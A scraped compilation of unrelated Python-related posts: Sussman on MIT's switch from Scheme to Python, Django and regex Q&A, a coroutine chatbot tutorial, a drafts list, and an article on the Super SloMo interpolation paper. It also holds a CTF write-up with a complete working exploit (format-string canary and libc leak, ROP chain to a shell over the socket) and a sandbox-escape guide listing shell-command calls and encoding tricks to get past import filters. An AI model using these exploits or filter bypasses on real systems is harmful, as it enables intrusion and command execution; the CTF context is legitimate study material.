
Why MIT now uses Python instead of Scheme for its intro to comp sci (2009)


This week, I find myself lucky enough to be at the International Lisp Conference at MIT in Cambridge, MA. I won’t get into why I’m here right now, for those of you who might be surprised. The purpose of this post is simply to paraphrase what Gerald Jay Sussman, one of the original creators of Scheme, said yesterday in a brief impromptu talk about why the computer science department at MIT had recently switched to using Python in its undergraduate program. This change was widely panned when it was announced, by many people all across the programming and computing world from various disciplines, so it seems worthwhile to try to document what Prof. Sussman said.

(The impromptu talk happened much after Monday’s formal talks and presentations, and I don’t think that anyone was recording Prof. Sussman’s remarks. If anyone does have a recording, by all means, post it, and I’ll link to it here ― and probably just drop my paraphrasing.)

This is all from memory, so I’ll just apologize ahead of time for any errors or misinterpretations I propagate. If anyone has any corrections, by all means, leave a comment (try to keep your debate reflex in check, though). In a couple of places, I’ve added notes in italics. Just to keep things simple and concise, the following is written in first-person perspective:

When we conceived of scheme in the 1970’s, programming was a very different exercise than it is now. Then, what generally happened was a programmer would think for a really long time, and then write just a little bit of code, and in practical terms, programming involved assembling many very small pieces into a larger whole that had aggregate ( did he say ‘emergent’? ) behaviour. It was a much simpler time.

Critically, this is the world for which scheme was originally designed. Building larger programs out of a group of very small, understandable pieces is what things like recursion and functional programming are built for.

The world isn’t like that anymore. At some point along the way ( he may have referred to the 1990’s specifically ), the systems that were being built and the libraries and components that one had available to build systems were so large, that it was impossible for any one programmer to be aware of all of the individual pieces, never mind understand them. For example, the engineer who designs a chip, which now has hundreds of pins, generally doesn’t talk to the fellow who’s building a mobile phone user interface.

The fundamental difference is that programming today is all about doing science on the parts you have to work with. That means looking at reams and reams of man pages and determining that POSIX does this thing, but windows does this other thing, and patching together the disparate parts to make a usable whole.

Beyond that, the world is messier in general. There’s massive amounts of data floating around, and the kinds of problems that we’re trying to solve are much sloppier, and the solutions a lot less discrete than they used to be.

Robotics is a primary example of the combination of these two factors. Robots are magnificently complicated and messy, with physical parts in the physical world. A robot doesn’t just move forward along the ground linearly and without interruption: the wheels will slip on the ground, the thing will get knocked over, etc.

This is a very different world, and we decided that we should adjust our curriculum to account for that. So, a committee ( here, Prof. Sussman peaked his hands over his head, which I interpreted to indicate pointy-headedness ) got together and decided that python was the most appropriate choice for future undergraduate education. Why did they choose python? Who knows, it’s probably because python has a good standard library for interacting with the robot.

That is my best paraphrasing of Prof. Sussman’s remarks. I spoke with him briefly earlier today, primarily to ask his permission for me to post this sort of first-person paraphrasing; he replied: “Sure, as long as you paraphrase me accurately.” Hopefully I succeeded; I’ll mention again my solicitation for corrections in the comments.

As a short addendum, while I had Prof. Sussman’s ear, I asked him whether he thought that the shift in the nature of a typical programmer’s world minimizes the relevancy of the themes and principles embodied in scheme. His response was an emphatic ‘no’; in the general case, those core ideas and principles that scheme and SICP have helped to spread for so many years are just as important as they ever were. However, he did say that starting off with python makes an undergraduate’s initial experiences maximally productive in the current environment. To that, I suggested that that dynamic makes it far easier to “hook” undergrads on “computer science” and programming, and retaining people’s interest and attracting people to the field(s) is a good thing in general; Prof. Sussman agreed with that tangential point.


Get an empty file when served by django


I have the following code for managing file download through django.

def serve_file(request, id):
    file = models.X.objects.get(id=id).file  # FileField
    file.open('rb')
    wrapper = FileWrapper(file)
    mt = mimetypes.guess_type(file.name)[0]
    response = HttpResponse(wrapper, content_type=mt)
    import unicodedata, os.path
    filename = unicodedata.normalize('NFKD', os.path.basename(file.name)).encode("utf8", 'ignore')
    filename = filename.replace(' ', '-')  # Avoid the browser ignoring any char after a space
    response['Content-Length'] = file.size
    response['Content-Disposition'] = 'attachment; filename={0}'.format(filename)
    #print response
    return response

Unfortunately, my browser gets an empty file when downloading.

The printed response seems correct:

Content-Length: 3906
Content-Type: text/plain
Content-Disposition: attachment; filename=toto.txt
blah blah ....

I have similar code running ok. I don't see what can be the problem. Any idea?

PS: I have tested the solution proposed here and got the same behavior.

Update: Replacing wrapper = FileWrapper(file) by wrapper = file.read() seems to fix the problem

Update: If I comment out the print response, I get a similar issue: the file is empty. Only difference: Firefox detects a 20-byte size (the file is bigger than that).

A file object is an iterable and a generator. It can be read only once before being exhausted. Then you have to make a new one, or use a method to go back to the beginning of the object (e.g. seek()).

read() returns a string, which can be read multiple times without any problem, which is why it solves your issue.

So just make sure that if you use a file-like object, you don't read it twice in a row. E.g. don't print it and then return it.
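To make the fix concrete, here is a minimal sketch of the view under the same assumptions as the question (a model X with a FileField named file, referenced through the questioner's models module); it rewinds the file and does not consume the wrapper before returning it:

from wsgiref.util import FileWrapper   # older Django also exposed FileWrapper via django.core.servers.basehttp
from django.http import HttpResponse
import mimetypes
import os.path

def serve_file(request, id):
    f = models.X.objects.get(id=id).file   # FileField, as in the question
    f.open('rb')
    f.seek(0)                              # make sure we are at the start of the file
    mt = mimetypes.guess_type(f.name)[0] or 'application/octet-stream'
    response = HttpResponse(FileWrapper(f), content_type=mt)
    response['Content-Length'] = f.size
    response['Content-Disposition'] = 'attachment; filename={0}'.format(os.path.basename(f.name))
    return response                        # do not print or otherwise iterate the response first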

Python cannot parse date with regex


I have a program in which the user can enter a string that contains a date. I am using a regex to match \d+\/\d+\/\d+ and extract the date from the string, but for some reason, in my test case only the last entry works.

import datetime
import re

dateList = []
dates = ["Foo (8/15/15) Bar", "(8/15/15)", "8/15/15"]
reg = re.compile('(\d+\/\d+\/\d+)')
for date in dates:
    matching = reg.match(date)
    if matching is not None:
        print date, matching.group(1)
    else:
        print date, "is not valid date"

returns

Foo (8/15/15) Bar is not valid date
(8/15/15) is not valid date
8/15/15 8/15/15

Is there something wrong with my RegEx? I tested it with RegEx101.com and it seemed to work fine

if you are looking for a partial match of the regex, use search:

import datetime
import re

dateList = []
dates = ["Foo (8/15/15) Bar", "(8/15/15)", "8/15/15"]
reg = re.compile('([0-9]+/[0-9]+/[0-9]+)')
for date in dates:
    matching = reg.search(date)  # <- .search instead of .match
    if matching is not None:
        print( date, matching.group(1) )
    else:
        print( date, "is not valid date" )

An interesting web+pwn challenge from X-MAS CTF on Christmas Eve


0x001 Introduction

I recently had some free time and worked through the pwn challenges from X-MAS CTF; the challenge quality is very good. Along the way I hit a web+pwn challenge that took quite a bit of time. This post mainly discusses, from the angles of child-process debugging and socket communication, how to solve this kind of pwn challenge built on a socket service.

Challenge download:

Link: https://pan.baidu.com/s/1G4L-B1rSydLRCJ-9Zcy9Ug  password: wsxd

0x002 Analysis

The challenge provides a socket-based server (with all protections enabled) and libc.so.

Start the server and visit http://localhost:1337 in a browser; a page like the one below appears. It has a bit of a web-challenge feel, and it literally says that an interface callable via GET requests has been reserved.

After some experimenting, I found it can be called like this:

/?toy=base64_string

For example, to request the hello world page, pass the base64 encoding of hello world, aGVsbG8gd29ybGQ=.

First, test for an overflow by passing in the base64 encoding of an overly long string:

/?toy=QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQ==

The page crashes immediately and the server's terminal reports stack smashing, so an overflow occurred. But there is a canary, so next we look for a hole that allows an info leak.

0x003 Bypass Canary

In the route function there is a format string bug that can be used to leak the stack cookie.

A few words about how to debug this:

For an ordinary pwn challenge started via socat, there is only one process to debug. With a socket service, each incoming request forks a child process whose memory layout is identical to the parent's; by the same token, the canary leaked across multiple sessions is identical too. If you set a breakpoint in the child's code directly, execution will not stop there; you first have to tell gdb to follow the child with set follow-fork-mode child.

Set a breakpoint at route, enable following the child process, and run this leak script:

#! /usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
import re

def _request(gift, fmt, ctl):
    req = "GET /?toy={} HTTP/1.1\r\n".format(gift)
    req += "User-Agent: {}\r\n".format(fmt)
    s = remote("localhost", 1337, level="error")
    s.s(req)
    try:
        if not ctl:
            return re.findall("<br>(.*?)</small>", s.recvall())[0][10:]
        else:
            return s.irt()
    except EOFError:
        return None
    finally:
        s.close()

def pwn():
    leak = _request(b64e('wooy0ung'), '%p ' * 200, False).split(' ')

if __name__ == '__main__':
    pwn()

Execution now breaks at the printf call; the value at this position on the stack is the cookie.

Check the memory layout and, while we're at it, leak pie_base and libc_base.

Comparing against the base addresses, we confirm that these spots can be used for the leak: 0x0000555555556006 - 0x0000555555554000 = 0x2006 and 0x00007ffff7a2d830 - 0x00007ffff7a0d000 = 0x20830.

Converting, we get the base addresses.

0x004 Stack overflow

As for the overflow point, it took a long time to find. With the server set to follow the child process, run this PoC:

#! /usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
def pwn():
    pl = "QWEwQWExQWEyQWEzQWE0QWE1QWE2QWE3QWE4QWE5QWIwQWIxQWIyQWIzQWI0QWI1QWI2QWI3QWI4"
    pl += "QWI5QWMwQWMxQWMyQWMzQWM0QWM1QWM2QWM3QWM4QWM5QWQwQWQxQWQyQWQzQWQ0QWQ1QWQ2QWQ3"
    pl += "QWQ4QWQ5QWUwQWUxQWUyQWUzQWU0QWU1QWU2QWU3QWU4QWU5QWYwQWYxQWYyQWYzQWY0QWY1QWY2"
    pl += "QWY3QWY4QWY5QWcwQWcxQWcyQWczQWc0QWc1QWc= "
    req = "GET /?toy={} HTTP/1.1\r\n".format(pl)
    s = remote("localhost", 1337, level="error")
    s.s(req)

if __name__ == '__main__':
    pwn()

The child process crashes.

Looking at the backtrace, the crash starts in parse_query_string.

Follow the child process again and stop at the call to base64decode.

First check the stack contents; at this point they are still intact.

After base64decode returns, the stack has been overwritten. Comparing against the intact stack contents gives the offset of stack_cookie: 0x928 - 0x8e0 = 0x48.

Looking at the code of base64decode, the overflow point is finally confirmed here; a2 is a local array passed in by the caller of base64decode.

Looking at the stack layout, a2's buffer is only 0x48 bytes, so writing past it causes the overflow.

0x005 ROP

The analysis is now complete, and the rest is the standard stack-overflow routine. Just note that the exploitation happens under a socket service, so stdin and stdout also need to be redirected to the sockfd. The ROP chain can be constructed like this:

#1.Smash stack bypass
pl = ''
pl += 'a'*0x48
pl += p64(stack_cookie)
#2.Call dup2(4,1) [out]
pl += p64(ret)*4
pl += p64(rdi)
pl += p64(4)
pl += p64(rdx_rsi)
pl += 'a'*8
pl += p64(1)
pl += p64(libc.sym['dup2'])
#3.Call dup2(4,0) [in]
pl += p64(ret)*4
pl += p64(rdi)
pl += p64(4)
pl += p64(rdx_rsi)
pl += 'a'*8
pl += p64(0)
pl += p64(libc.sym['dup2'])
#4.Call system('/bin/sh')
pl += p64(ret)
pl += p64(libc.address+0x45216)
pl.rjust(200, '\x00')

The full exploit:

#! /usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
import os, sys
import requests
import re
DEBUG = 4
context.arch = 'amd64'
context.log_level = 'debug'
elf = ELF('./server',checksec=False)
# synonyms for faster typing
tube.s = tube.send
tube.sl = tube.sendline
tube.sa = tube.sendafter
tube.sla = tube.sendlineafter
tube.r = tube.recv
tube.ru = tube.recvuntil
tube.rl = tube.recvline
tube.ra = tube.recvall
tube.rr = tube.recvregex
tube.irt = tube.interactive
if DEBUG == 1:
    libc = ELF('/root/workspace/expmake/libc_x64', checksec=False)
    s = process('./toy')
elif DEBUG == 2:
    libc = ELF('/root/workspace/expmake/libc_x64', checksec=False)
    s = process('./toy', env={'LD_PRELOAD': '/root/workspace/expmake/libc_x64'})
elif DEBUG == 3:
    libc = ELF('/root/workspace/expmake/libc_x64', checksec=False)
    ip = 'localhost'
    port = 1337
    s = remote(ip, port)
elif DEBUG == 4:
    libc = ELF('/root/workspace/expmake/libc_x64', checksec=False)

def _request(gift, fmt, ctl):
    req = "GET /?toy={} HTTP/1.1\r\n".format(gift)
    req += "User-Agent: {}\r\n".format(fmt)
    s = remote("localhost", 1337, level="error")
    s.s(req)
    try:
        if not ctl:
            return re.findall("<br>(.*?)</small>", s.recvall())[0][10:]
        else:
            return s.irt()
    except EOFError:
        return None
    finally:
        s.close()

def pwn():
    leak = _request(b64e('wooy0ung'), '%p ' * 200, False).split(' ')
    #print leak
    pie_base = int(leak[0], 16) - 0x2006        # 0x0000555555556006-0x0000555555554000 = 0x2006
    stack_cookie = int(leak[6], 16)
    libc.address = int(leak[36], 16) - 0x20830  # 0x7ffff7a2d830-0x00007ffff7a0d000 = 0x20830
    info("0x%x pie_base", pie_base)
    info("0x%x stack_cookie", stack_cookie)
    info("0x%x libc.address", libc.address)
    '''
    pl = "QWEwQWExQWEyQWEzQWE0QWE1QWE2QWE3QWE4QWE5QWIwQWIxQWIyQWIzQWI0QWI1QWI2QWI3QWI4"
    pl += "QWI5QWMwQWMxQWMyQWMzQWM0QWM1QWM2QWM3QWM4QWM5QWQwQWQxQWQyQWQzQWQ0QWQ1QWQ2QWQ3"
    pl += "QWQ4QWQ5QWUwQWUxQWUyQWUzQWU0QWU1QWU2QWU3QWU4QWU5QWYwQWYxQWYyQWYzQWY0QWY1QWY2"
    pl += "QWY3QWY4QWY5QWcwQWcxQWcyQWczQWc0QWc1QWc= "
    req = "GET /?toy={} HTTP/1.1\r\n".format(pl)
    s = remote("localhost", 1337, level="error")
    s.s(req)
    '''
    ret = pie_base + 0x0000000000000c4e
    rdi = pie_base + 0x0000000000001d9b
    rsi_r15 = pie_base + 0x0000000000001d99
    rdx_rsi = libc.address + 0x00000000001150c9
    #1. Smash stack bypass
    pl = ''
    pl += 'a' * 0x48
    pl += p64(stack_cookie)
    #2. Call dup2(4,1) [out]
    pl += p64(ret) * 4
    pl += p64(rdi)
    pl += p64(4)
    pl += p64(rdx_rsi)
    pl += 'a' * 8
    pl += p64(1)
    pl += p64(libc.sym['dup2'])
    #3. Call dup2(4,0) [in]
    pl += p64(ret) * 4
    pl += p64(rdi)
    pl += p64(4)
    pl += p64(rdx_rsi)
    pl += 'a' * 8
    pl += p64(0)
    pl += p64(libc.sym['dup2'])
    #4. Call system('/bin/sh')
    pl += p64(ret)
    pl += p64(libc.address + 0x45216)  # one_gadget
    pl.rjust(200, '\x00')
    _request(b64e(pl), '', True)

if __name__ == '__main__':
    pwn()

WIN~



A year of almost blogging

$
0
0

2019 is around the corner and I am looking at how many blog posts I wrote this year, and the number is a resounding zero. On the other hand, looking in my drafts folder, I see quite a few posts in various stages of writing, and I even think some of them are interesting :) Here are a few examples:

Extract, Anonymize, Transform, Load is the new ELT
One of the major design decisions in the current platform we're developing is to handle and isolate all PII (and PHI) as early as possible in the ingestion pipeline and build the rest of the system on de-identified data. This post would have explained how and what we're doing and why it is important.

The woes of pySpark
I've been using Spark since mid-2014, i.e. v1, but only via the JVM (mostly using Scala), and it sure wasn't a fun ride all the time (e.g. read this 2014 post on how fun it was to use parquet files back then). This year I began using it with Python, and that felt like going back in time. First there were the problems of using it with Pandas (Spark 2.3 made that a lot easier, but it wasn't until the end of June that it made it to GCP's Cloud Dataproc), and that was the easy part. The main problem with pySpark is tuning jobs so that they complete when going from a toy sample to big data. I wanted to round up some insights I gathered while fighting Spark on this.

How we've built our data ingestion and model creation pipeline on Kubernetes
Apropos the previous point, we managed to cut down our execution time and compute resources significantly (from several hours on 100 servers to under 30 minutes with about 20) by breaking our pipeline up to do minimal preparation in Spark and handling the bulk of the work as queued jobs on Kubernetes. I thought it would be interesting to explain what we did there.

Creating services. It isn't just carving the monolith
Whenever I read a write-up on micro-services, it never fails to irk me how it is always monoliths and micro-services, as if there's nothing else in between. I began writing this note that you can also evolve services into new services and various other architectures.

Docker for testing
Another pet peeve I have is the "test pyramid", the thinking that the right way is to have lots and lots of unit tests, some integration tests, and few end-to-end tests. I think it should be a "test rhombus", esp. in a world of micro-services where the interactions are what make the system and the testing surface of each service is relatively small. Anyway, a lot of what's bad in unit tests is the whole mocking and faking thing, esp. of infrastructure, which makes the software more complex and the tests ickier. Docker can solve that: you can run your dependencies as Docker images and use them. Both the JVM and Python (the two eco-systems I'm mostly using) have testing libs that support integrating with Docker (run images before tests start and clean up afterward), so tests can also operate in build environments and not just on the devs' laptops.

Using KeyCloak for authentication and authorization
When delivering a SaaS solution there are many online services that manage authorization for you (like Okta, Auth0, etc.); when it comes to on-prem, the options are more limited. Having implemented security solutions in the past, I know I don't want to do that again. Then I found RedHat's KeyCloak, currently in v4.8.1: open source, themeable, works out of the box with minimal configuration, and integrates easily (with Angular and Python in my case). I was going to write how we're using its JWT tokens for both authentication and authorization.

Kubernetes, Git and an integration environment per feature
We are building software using Kanban and monthly release trains. To support that we've developed a CI/CD pipeline that integrates with our project management software ( TargetProcess ) and creates git branches and integration environments automatically (thanks to Nader Ganayem and Dotan Spector who did all the work). I think both the technical and dev-management aspects are interesting.

I don’t know if there are any readers left for this blog as it has been dormant for so long, but, instead of looking at this as missed blogging opportunities, I’ll treat this as a new year’s resolution to turn at least some of this list into posts

In the age of AI, I wrote a chatbot in Python, and it works great!


In the age of AI, I wrote a chatbot in Python, and it works great!

Artificial intelligence is already the trend: smart hotels, smart internet cafes, self-driving cars and more are already real, and before long they will be part of our everyday lives. At the same time, the arrival of the AI era means many people will face unemployment. We have to keep pace with the times so that we are not left behind or weeded out!

And Python, the language of choice for AI, will be our first target to learn. As someone once put it:

In the society of the near future, people who don't know Python will be the new "illiterates"! Python is also the best fit for people with no programming background at all, so I started my own Python learning journey!

As long as you follow the right steps and the right methods and study seriously, believe me, you will pick it up quickly!


OK, today we are going to write a smart chatbot.

Part 1. Dissecting a generator object

First, a simple example: we create a generator function and then produce a generator object from it.


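The code in the original post was a screenshot; a minimal sketch of what it likely showed, assuming a trivial generator function (the name gen and its body are made up):

def gen():
    for i in range(3):
        yield i

G = gen()
print(G)   # <generator object gen at 0x...>: G is a generator object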

This tells us that G is a generator object; let's dissect it and see what is actually inside.

print dir(G)

Notice there are four rather special methods: close(), next(), send(), throw(). next() was covered in the previous two articles, so I won't repeat it; today we focus on send(), throw() and close().

Part 2. What is a coroutine

Python's coroutines are a bit like threads: you can think of a coroutine as a user-level lightweight thread or micro-thread. It can run several functions and make them appear to run at the same time, while having advantages over threads such as far lower memory use, low overhead, and no need to worry about thread safety. (What a thread is will be covered in a later article.)

1. The send() function

send() is used to pass a value in and interact with the generator. When execution reaches receive = yield, the generator is suspended and waits for send to be called; when the outside code then calls send with a value, that value is assigned to receive.

Example code:


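The example code was a screenshot as well; below is a minimal reconstruction based on points a) to d) that follow (the printed strings are assumptions):

def echo():
    while True:
        receive = yield                   # execution suspends here until send() is called
        print('Processing: %s' % receive)

Echo = echo()        # b) create the generator object
next(Echo)           # c) advance the generator to the first yield expression
Echo.send('hello')   # d) 'hello' is assigned to receive and processed
Echo.send('world')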

a) Inside the echo function there is an infinite loop with one key line, receive = yield; this is where the value sent in from outside via send arrives.

b) The outer code first has to create a generator object, i.e. Echo = echo().

c) A crucial step is next(Echo): you must call next once so the generator advances to the first yield expression.

d) After that we can combine yield and send to take data from the outside world and run it through whatever processing we want.

2. The throw() function

throw mainly sends an exception into the generator; it works with built-in exceptions (and of course custom ones).

Example code:


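Again the code was a screenshot; here is a sketch reconstructed from points a) to d) below (the yielded strings and the except message mirror the description, not the original source):

def gen():
    while True:
        try:
            yield 'First'
            yield 'Second'
        except ValueError:
            print('Catch the TypeError')   # message as described in the article

G = gen()                    # a) create the generator object
print(next(G))               # b) -> 'First', paused just before yield 'Second'
print(G.throw(ValueError))   # c) the except branch runs and prints the message,
                             #    then the loop restarts and yields 'First' again
print(next(G))               # d) -> 'Second'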

a) Create the generator object G.

b) Call next(G) and print the result; we get 'First' from the first yield and stop just before yield 'Second'.

c) Throw the exception class ValueError (note that ValueError is a class, not a string). When the generator receives the exception it skips yield 'Second', goes straight into the except branch, and prints 'Catch the TypeError'.

d) Call next(G) again and print the result; we are back at the top of the while loop, the first yield 'First' is consumed, and yield 'Second' executes.

3. The close() function

close stops the generator; calling next after it has been stopped raises a StopIteration error.

Example code:


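A sketch of the close() example, reusing the echo generator from the send() sketch above:

Echo = echo()
next(Echo)
Echo.send('hello')
Echo.close()             # stop the generator
try:
    Echo.send('123')     # raises StopIteration because the generator is closed
except StopIteration:
    print('the generator has been closed')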

Once the generator object Echo has had close() called on it, calling send('123') again throws a StopIteration exception, which we then catch.

Part 3. Practical application: a mini chatbot

After all this, you may be feeling a bit dizzy; generators are one of the most complex concepts in Python (someone asked whether there is a runner-up, and yes, it's decorators). So let's use coroutines to write a small chatbot~~

1) Create a chatbot generator function; think of it as a worker function running in the background.

2) The frontend keeps reading the user's input and uses the coroutine to send it to the backend for processing. (A sketch of both parts follows.)


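The chatbot code was only shown as screenshots; here is a minimal, hypothetical reconstruction of the two parts (the replies and prompts are made up):

def chat_robot():
    # backend "worker": receives messages via send() and replies
    while True:
        msg = yield
        if 'hello' in msg:
            print('Robot: hello, nice to meet you')
        elif 'name' in msg:
            print('Robot: you can call me PyBot')
        else:
            print('Robot: sorry, I do not understand "%s"' % msg)

def main():
    robot = chat_robot()
    next(robot)                   # prime the coroutine
    while True:
        msg = input('You: ')      # on Python 2 use raw_input instead of input
        if msg in ('quit', 'exit'):
            robot.close()
            break
        robot.send(msg)           # hand the input to the backend coroutine

if __name__ == '__main__':
    main()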

Here is what running it looks like:


Turning ordinary video into slow motion: "AI frame interpolation" is now open source


In June this year NVIDIA published a paper on generating high-quality slow-motion video, "Super SloMo: High Quality Estimation of Multiple Intermediate Frames for Video Interpolation", which explores how to turn video shot on ordinary devices into high-frame-rate slow motion. The idea is to synthesize additional frames between adjacent frames. Let's look at the effect first.

Er... NVIDIA's demo shows a water balloon being burst with a fast swing of a tennis racket; at normal speed the video looks like this:


The figures below show slow-motion videos produced with the original SloMo software and with Super SloMo, respectively.

As the comparison shows, the slow-motion video made with the original SloMo does reveal details the naked eye cannot catch, but the Super SloMo version recovers more detail and plays more smoothly. The difference is fundamental: the former does not generate any new frames, while the latter uses a neural network to synthesize new frames, so the clip contains more frames, which adds detail and smoothness.

Now look at the drifting race car below; the original video is 30 FPS. Looks fine, right? But what about after slowing it down?

In the top half of the next figure, the originally smooth drift turns into something like a stop-motion sequence pieced together from posed photos (Photoshopping a water splash is a lot easier than Photoshopping a drift). After the algorithm interpolates it up to 240 FPS, though, the clip at the bottom immediately has a Fast & Furious feel.


Unfortunately, the authors released neither the dataset nor the code with the paper, to the great disappointment of the geeks who wanted to build this flashy technique themselves. But (and here is the key point) the community is powerful: recently a GitHub user named avinashpaliwal open-sourced his own PyTorch implementation of Super SloMo.

GitHub: https://github.com/avinashpaliwal/Super-SloMo

Results of the PyTorch implementation of Super SloMo

Results on the UCF101 dataset using the evaluation script provided by the author; the script used is et_results_bug_fixed.sh. It applies motion masks when computing PSNR, SSIM and IE.

Prerequisites

The codebase was developed and tested with PyTorch 0.4.1 and CUDA 9.2.

Training

Preparing the training data

To train the model with the provided code, the data first has to be formatted in a specific way.

The create_dataset.py script uses ffmpeg to extract frames from videos.

For adobe240fps, download the dataset below, unzip it, and run the following command:

python data\create_dataset.py --ffmpeg_dir path\to\ffmpeg --videos_folder path\to\adobe240fps\videoFolder --dataset_folder path\to\dataset --dataset adobe240fps

Dataset: http://www.cs.ubc.ca/labs/imager/tr/2017/DeepVideoDeblurring/DeepVideoDeblurring_Dataset_Original_High_FPS_Videos.zip

Evaluation

Pretrained model

You can download a pretrained model, trained on the adobe240fps dataset, from:

https://drive.google.com/open?id=1IvobLDbRiBgZr3ryCRrWL8xDbMZ-KnpF

So how do you have fun with this model? Dig out those treasured clips shot on an old, mediocre phone; doesn't a slow-motion replay give them a whole new flavor?


Those fretting over equipment costs for homemade films, feeling energized now?

And the animation studios whose budget runs dry whenever a high-speed fight scene comes up, don't you wish you had met this sooner?

With it, couldn't some anime squeeze out an extra half-year of episodes?

Paper

Project page: https://people.cs.umass.edu/~hzjiang/projects/superslomo/

Paper: https://arxiv.org/pdf/1712.00080.pdf

Abstract: Given two consecutive frames, video interpolation aims to generate intermediate frames that form spatially and temporally coherent video sequences. Most existing methods focus on single-frame interpolation; this paper proposes an end-to-end convolutional neural network for variable-length multi-frame video interpolation in which motion interpretation and occlusion reasoning are jointly modeled. The approach starts by computing bidirectional optical flow between the input images with a U-Net architecture. These flows are then linearly combined at each time step to approximate the intermediate bidirectional flows. These approximate flows, however, are only useful in locally smooth regions and produce artifacts around motion boundaries.

To address this shortcoming, the authors use another U-Net to refine the approximated flows and to predict soft visibility maps. Finally, the two input images are warped and linearly fused to form each intermediate frame. By applying the visibility maps to the warped images before fusion, the authors exclude occluded pixels from contributing to the interpolated intermediate frame, avoiding artifacts. Since none of the learned network parameters are time-dependent, the method can produce as many intermediate frames as needed. The authors train the network on 1,132 video clips at 240 frames per second, containing 300,000 individual frames. Experiments on several datasets, predicting different numbers of interpolated frames, show the method outperforms existing approaches.

Method

The researchers synthesize intermediate frames via optical flow interpolation, based on two key ingredients: temporal consistency and occlusion reasoning.

Temporal consistency means the intermediate frame I_t can be produced from the initial frame I_0 through a warp g() combined with the optical flow F, or from the final frame I_1 combined with the flow; in general it is a linear combination of the two.


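The formula itself was an image in the original article; based on the description here and on the Super SloMo paper, it is approximately:

\hat{I}_t = \alpha_0 \odot g(I_0, F_{t \to 0}) + (1 - \alpha_0) \odot g(I_1, F_{t \to 1})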

In general, as time flows, the content of I_t shifts from being closer to I_0 to being closer to I_1, so α_0 should be a linear function of t (ignoring occlusion): when t = 0, α_0 = 1; when t = 1, α_0 = 0.

As shown in Figure 2:


Figure 2: An example of flow interpolation results, with t = 0.5. The whole scene moves to the left (camera panning) and the motorcycle also moves left. The last row shows that the refinement from the flow interpolation CNN happens mainly around motion boundaries (the whiter a pixel, the larger the refinement).

Occlusion reasoning means that a pixel (or object) visible in I_0 may not appear in I_1, and vice versa. So we must weight how much each of the two input frames contributes to I_t under occlusion, which is expressed with visibility maps V.

So the final intermediate-frame synthesis equation is (Z is a normalization factor):


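The equation was shown only as an image; reconstructed from the paper (not verbatim from this article), the synthesis with visibility maps is approximately:

\hat{I}_t = \frac{1}{Z} \odot \Big( (1-t)\, V_{t \leftarrow 0} \odot g(I_0, F_{t \to 0}) + t\, V_{t \leftarrow 1} \odot g(I_1, F_{t \to 1}) \Big), \qquad Z = (1-t)\, V_{t \leftarrow 0} + t\, V_{t \leftarrow 1}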

As shown in Figure 3:

Figure 3: An example of predicted visibility maps, with t = 0.5. The athlete's hand moves upward from T=0 to T=1, so the region above and to the right of the arm is visible at T=0 but occluded (invisible) at T=1. The visibility maps in the fourth row show this clearly: the white area around the arm in V_t←0 indicates that those pixels of I_0 contribute most to synthesizing I_t, while black areas contribute least. The same reasoning applies to V_t←1.

Since the intermediate frame itself is the thing being predicted and does not exist beforehand, the flows between I_t and I_0/I_1 have to be approximated from the flow between I_0 and I_1:


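These approximation formulas were also an image; as given in the paper (reconstructed here, so treat the exact form as an assumption):

\hat{F}_{t \to 0} = -(1-t)\, t\, F_{0 \to 1} + t^2\, F_{1 \to 0}, \qquad \hat{F}_{t \to 1} = (1-t)^2\, F_{0 \to 1} - t\,(1-t)\, F_{1 \to 0}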

In addition, for occlusion reasoning it is likewise natural to assume that when t is close to 0, I_t is closer to I_0, and when t is close to 1, I_t is closer to I_1.

So the final architecture works in two stages. The first stage feeds I_0 and I_1 into a flow computation CNN to get the forward and backward flow between them. The second stage then takes as input the flows between I_0 and I_1, the frames I_0 and I_1 themselves, the warps of I_0 and I_1 toward I_t, and the approximate flows from I_0 and I_1 to I_t, and outputs the visibility maps together with residual corrections to those approximate flows. Combining these quantities yields the final I_t directly, as shown in the figure below.


The loss has four terms: a reconstruction loss, the L1 loss between the synthesized frame and the ground-truth intermediate frame from the dataset; a perceptual loss, which reduces blur; a warping loss, the L1 loss between a frame and the result of warping the other frames with the optical flow; and a smoothness loss, which constrains the gradients of the flow field.

Figure 9: The main CNN architecture is a U-Net.

Figure 8: PSNR at each time step when generating 31 intermediate frames on the high-frame-rate Sintel dataset.

Readers can also watch the paper's CVPR 2018 spotlight video for a walkthrough of the work.

Python Sandbox Escape

Preface

With SSTI (server-side template injection) we have already touched on Python sandbox escape techniques. Command execution there is essentially a form of sandbox bypass, and the techniques carry over directly to Python sandbox escapes.

The Python sandbox

The Python language and interpreter have no built-in sandbox. The "sandbox" discussed here is what some websites do when offering online Python execution: because they don't want users running system commands and damaging the system, they ship a stripped-down version of Python that removes command execution, server file read/write, and other related functions or modules.

Sandbox escape ideas

For a Python sandbox escape, the end goal is usually reached in one of the following ways:

Use the popen and system functions from the os package to run shell commands directly; use the methods in the commands module; use subprocess; or write a file to a chosen location and then use other auxiliary means.

import os
import subprocess
import commands
# run a shell command directly, using ifconfig as the example
os.system('ifconfig')
os.popen('ifconfig')
commands.getoutput('ifconfig')
commands.getstatusoutput('ifconfig')
subprocess.call(['ifconfig'], shell=True)

Filtering of the import keyword

In some CTFs, the keywords for importing certain packages are filtered, so you cannot use os and friends directly for command execution. If keywords such as sys, os, commands, or subprocess are filtered, you can run the original keyword through various encode/decode schemes to get past the keyword check. If the sandbox you are facing cannot import any package at all, then the import keyword itself is probably filtered; you can try the following to get around it:

The __import__ function:

res = __import__("pbzznaqf".decode('rot_13'))   # rot13 of "commands"
res.getoutput('ifconfig')

The importlib library:

import importlib
res = importlib.import_module("pbzznaqf".decode('rot_13'))
print res.getoutput('ifconfig')

Encoding and decoding to get around string filters:

>>> import base64
>>> base64.b64encode('__import__')
'X19pbXBvcnRfXw=='
>>> base64.b64encode('os')
'b3M='

